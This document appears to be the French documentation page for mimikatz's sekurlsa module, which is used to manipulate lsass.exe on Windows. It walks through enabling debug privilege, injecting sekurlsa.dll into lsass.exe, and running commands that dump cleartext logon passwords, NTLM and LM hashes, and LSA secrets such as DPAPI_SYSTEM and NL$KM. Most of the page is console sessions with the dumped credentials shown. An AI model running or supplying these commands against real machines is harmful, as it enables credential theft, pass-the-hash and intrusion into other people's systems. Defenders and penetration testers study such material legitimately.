sekurlsa

ma librairie préférée pour manipuler lsass.exe
Avant de se service des méthodes offertes, il convient d’injecter la librairie dans lsass.exe

Exemple d’injection :

mimikatz 1.0 x86 (pre-alpha)    /* Traitement du Kiwi */

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz #

Méthodes offertes :

• Dump des sessions en cours :
  • @ getLogonPasswords
  • Par provider :
    • MSV1_0 (« pass the hash »)
    • TsPkg
    • WDigest
    • LiveSSP
    • Kerberos
• Dump des comptes locaux :
  • @ getLocalAccounts
  • @ getSAMFunctions
• Dump des secrets :
  • @ getSecrets
  • @ getSECFunctions

@ getLogonPasswords

Description : Énumère les sessions courantes et dump les mots de passe (ou hashes), pour tous les providers possible
Argument : full (optionnel)
Exemple : @getLogonPasswords full

mimikatz # mimikatz # @getLogonPasswords full

Authentification Id         : 0;514528
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-cp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-cp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-cp-x
         * Mot de passe : waza1234/
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-cp-x
         * Mot de passe : waza1234/
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-cp-x
         * Mot de passe : waza1234/
        livessp :       n.t. (LUID KO)

Authentification Id         : 0;254476
Package d'authentification  : LiveSSP
Utilisateur principal       : *****.000
Domaine d'authentification  : VM-W8-CP-X
        msv1_0 :
         * Utilisateur  : *****@*****.fr
         * Domaine      : MicrosoftAccount
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        wdigest :       n.t. (LUID KO)
        tspkg :
         * Utilisateur  : *****@*****.fr
         * Domaine      : MicrosoftAccount
         * Mot de passe : waza1234/
        kerberos :
         * Utilisateur  : *****.000
         * Domaine      : VM-W8-CP-X
         * Mot de passe :
        livessp :
         * Utilisateur  : *****@*****.fr
         * Domaine      : ps:password
         * Mot de passe : waza1234/

@ getSecrets

Description : Affiche les objets secrets conservé dans le hive SECURITY (comptes de services par exemple)
Arguments : n.a.
Exemple : @getSecrets

mimikatz # @getSecrets

Secret     : DefaultPassword
Credential : <NULL>

Secret     : DPAPI_SYSTEM
Credential :
01 00 00 00 8e 35 f3 cd 12 51 cd 39 fb 1f d8 4b f0 ed f4 17 86 09 8e 8b 90 ea 7f 29 dd a9 7c 0f
3a a5 57 06 7d fd 50 d9 a5 a1 e4 73

Secret     : NL$KM
Credential :
12 36 5d cc fc af 60 7d 9a 9a 93 ad 0d bb ff 58 d0 f1 47 4b 99 e7 24 dc 84 3f 3f 6f ba 1f 5e 45
6f 6b 95 65 83 a4 62 d7 db 5c 70 f6 e9 f7 6b 0e 76 2f 1b ab ed 84 b3 59 5e 3b 09 14 e6 16 05 91

Secret     : _SC_BBSvc
Credential : waza1234/

@ getSECFunctions

Description : Affiche les fonctions et pointeurs nécessaires aux manipulations des secrets
Arguments : n.a.
Exemple : @getSECFunctions

mimikatz # @getSECFunctions
** lsasrv.dll ** ; Statut recherche : OK :)

@LsaIOpenPolicyTrusted = 757CC760
@LsarOpenSecret        = 757BC88A
@LsarQuerySecret       = 757C1122
@LsarClose             = 757AAAE8